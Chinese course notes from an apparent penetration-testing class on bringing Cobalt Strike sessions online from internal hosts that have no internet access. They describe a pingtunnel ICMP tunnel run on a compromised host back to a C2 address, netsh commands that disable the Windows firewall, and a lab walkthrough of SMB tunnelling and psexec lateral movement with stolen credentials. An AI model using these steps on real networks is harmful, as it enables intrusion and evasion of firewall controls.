知识点
bash
复制代码
#知识点:
1、入站规则不出网上线方案
2、出站规则不出网上线方案
3、规则-隧道技术-SMB&ICMP
-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
-连接方向:正向&反向(基础课程有讲过)
#系列点:
1、判断什么时候用代理
2、判断什么时候用隧道
3、判断出网和不出网协议
4、如何使用代理建立节点并连接
5、如何使用隧道技术封装协议上线
6、判断哪些代理或隧道情况选择放弃
演示案例
bash
复制代码
1、不出网-控制上线-CS-反向连接
2、不出网-控制上线-CS-SMB隧道(使用SMB隧道普通用户是不行的,需要提权)
3、不出网-控制上线-CS-ICMP隧道
4、不出网-控制上线-CS-关闭防火墙
bash
复制代码
入站过滤上线:
1、隧道技术正向硬刚
2、反向连接跳过
3、关闭&删除&替换
适用利用入站通行拿到的高权限
出站过滤上线:
1、隧道技术反向硬刚
2、正向连接跳过
3、关闭&删除&替换
适用利用入站通行拿到的高权限
采用第三种方案:防火墙开关,删除规则,替换程序
适用于:
1、单纯的内网环境
2、单纯的内网域环境(域控没有设置组策略防火墙同步)
隧道技术上线:
HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等
除去SMB隧道,其他隧道技术大部分针对的出站策略绕过
ICMP
./pingtunnel -type server
肉鸡:(管理器运行)
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.22.130 -t 192.168.22.130:3344 -tcp 1 -noprint 1 -nolog 1
CS:
监听器1:127.0.0.1 3333
监听器2:192.168.22.130 3344
生成监听器1的Stager后门肉鸡执行
Windows防火墙命令:
https://www.cnblogs.com/tomtellyou/p/16300557.html
查看当前防火墙状态:netsh advfirewall show allprofiles
关闭防火墙:netsh advfirewall set allprofiles state off
开启防火墙:netsh advfirewall set allprofiles state on
恢复初始防火墙设置:netsh advfirewall reset
启用桌面防火墙: netsh advfirewall set allprofiles state on
设置默认输入和输出策略:netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
如果设置为拒绝使用blockinbound,blockoutbound
总结
bash
复制代码
拓扑图:在前一次的基础上,win2008做了入站限制(只让访问Web服务),win2012也做了入站限制(只让访问打印机)
思路:
win7还是有外网出口的,正向tcp/反向tcp都能直接拿下;
拿下win7后,生成正向tcp,让win7主动连接拿下win10(也可以反向,但需要在win7的11网卡上设置监听器,转发上线win10);
拿下win10后,这时想再用正向tcp拿下win2008已经不行了,因为win2008入站只让访问Web服务,可以考虑以下几种方法:
1.隧道技术正向硬刚(可以用icmp隧道,因为icmp是网络层协议,web服务属于应用层)
2.反向连接跳过(在win10的22网卡上设置监听器,转发上线win2008)
3.关闭&删除&替换(即使用命令关闭防火墙、删除策略、替换白名单策略所指向的exe指向木马,但是有限制条件)
拿下win2008后,使用tcp反向连接拿下win2012是不行的,因为tcp反向连接的流量到win2008时属于入站,而其做了入站限制。
同样,正向tcp肯定也是不行的,因为win2012限制了只能访问打印机。
现在的思路是:隧道技术正向硬刚(可以用SMB隧道,打印机一般都开有445端口)
需要在cs上创建smb的监听器,即smb管道,然后配合横向移动手段,比如用cs在win2008上扫描33网段存活主机,
扫到win2012后,右键其选择"横向移动" - "psexec64" - "输入前期信息收集到的用户名密码" - "监听器选择smb的监听器" - "会话选择win2008的33网段"
总的意思就是用win2008的会话进行smb的横向移动,拿下win2012